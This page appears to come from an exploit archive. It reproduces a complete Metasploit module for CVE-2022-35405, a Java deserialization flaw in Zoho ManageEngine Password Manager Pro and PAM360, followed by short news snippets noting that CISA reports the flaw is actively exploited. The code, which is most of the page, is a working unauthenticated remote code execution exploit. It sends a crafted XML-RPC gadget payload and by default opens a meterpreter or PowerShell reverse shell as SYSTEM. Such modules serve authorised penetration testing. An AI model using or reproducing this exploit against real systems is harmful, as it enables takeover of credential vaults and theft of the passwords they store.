Headline
Zoho Password Manager Pro XML-RPC Java Deserialization
This Metasploit module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain remote command execution as the SYSTEM user.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::JavaDeserialization def initialize(info = {}) super( update_info( info, 'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization', 'Description' => %q{ This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain RCE as the SYSTEM user. }, 'Author' => [ 'Vinicius', # Discovery 'Y4er', # Writeup 'Grant Willcox' # Exploit ], 'References' => [ ['CVE', '2022-35405'], ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch. ], 'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date. 'License' => MSF_LICENSE, 'Platform' => ['win'], 'Arch' => [ARCH_CMD, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Windows EXE Dropper', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } } ], [ 'Windows Powershell', { 'Arch' => ARCH_X64, 'Type' => :windows_powershell, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(7272), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check # Send an empty serialized object res = send_request_xmlrpc('') unless res return CheckCode::Unknown('Target did not respond to check.') end if res.body.include?('Failed to read result object: null') return CheckCode::Vulnerable('Target can deserialize arbitrary data.') end CheckCode::Safe('Target cannot deserialize arbitrary data.') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :windows_command execute_command(payload.encoded) when :windows_dropper cmd_target = targets.select { |target| target['Type'] == :windows_command }.first execute_cmdstager({ linemax: cmd_target.opts['Space'] }) when :windows_powershell execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) end end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") res = send_request_xmlrpc( generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd) ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}") end print_good("Successfully executed command: #{cmd}") end def send_request_xmlrpc(data) # http://xmlrpc.com/ # https://ws.apache.org/xmlrpc/ send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/xmlrpc'), 'ctype' => 'text/xml', 'data' => <<~XML <?xml version="1.0"?> <methodCall> <methodName>#{rand_text_alphanumeric(8..42)}</methodName> <params> <param> <value> <struct> <member> <name>#{rand_text_alphanumeric(8..42)}</name> <value> <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable> </value> </member> </struct> </value> </param> </params> </methodCall> XML ) endend
Related news
Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.
Categories: Exploits and vulnerabilities Categories: News The critical CVE-2022-35405 flaw affects several Zoho ManageEngine products. Federal and private organizations must patch now! (Read more...) The post Flaw in some ManageEngine apps is being actively exploited, says CISA appeared first on Malwarebytes Labs.
The bug allows unauthenticated code execution on the company's firewall products, and CISA says it poses "significant risk" to federal government.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation. "Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution," the agency
Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)